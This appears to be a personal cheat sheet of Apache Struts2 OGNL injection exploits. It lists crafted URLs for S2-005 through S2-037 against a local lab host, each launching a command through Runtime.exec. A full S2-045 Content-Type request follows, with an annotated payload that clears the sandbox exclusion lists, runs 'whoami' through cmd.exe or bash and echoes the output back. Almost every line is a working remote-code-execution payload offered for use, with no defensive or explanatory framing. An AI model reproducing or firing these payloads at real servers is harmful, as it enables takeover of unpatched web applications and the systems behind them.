S2-005

http://192.168.153.128:8080/S2-005/hello.action?('\43_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\u0023rt.exec(\43req.getParameter(%22cmd%22))')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))&cmd=calc

S2-008
http://192.168.153.128:8080/S2-005/hello.action?debug=browser&object=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23req%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%29%2c%23rt%3d%40java.lang.Runtime%40getRuntime%28%29%2c%23rt.exec%28%23req.getParameter%28%22cmd%22%29%29&cmd=calc


S2-009

http://192.168.153.128:8080/S2-009/hello.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27calc%27%29%29%28meh%29&(class.classLoader.jarPath)('meh')=true

S2-016

http://192.168.153.128:8080/S2-016/hello.action?redirect:${%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23req%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%29%2c%23rt%3d%40java.lang.Runtime%40getRuntime%28%29%2c%23rt.exec%28%23req.getParameter%28%22cmd%22%29%29}&cmd=calc

#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#rt=@java.lang.Runtime@getRuntime(),#rt.exec('calc')


S2-020

Class.ClassLoader.resources.dirContext.docBase=\\IP\evil


S2-032

http://192.168.153.128:8080/S2-032/hello.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).toString&cmd=calc

S2-037

http://192.168.153.128:8080/S2-037/orders/3/(%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%3f@java.lang.Runtime@getRuntime().exec(%23parameters.cmd):aa.json?cmd=calc

S2-045

POST /S2-045/hello.action HTTP/1.1
Accept-Encoding: identity
Content-Type: %{(#poc='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec('calc'))}
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Mobile Safari/537.36
Host: 192.168.153.128:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

%{
//进入处理MultiPartRequestWrapper逻辑
(#poc='multipart/form-data').

//bypass沙盒
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).

//命令执行
(#cmd='whoami').(#pwn=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#pwn?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).

//回显
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())

}





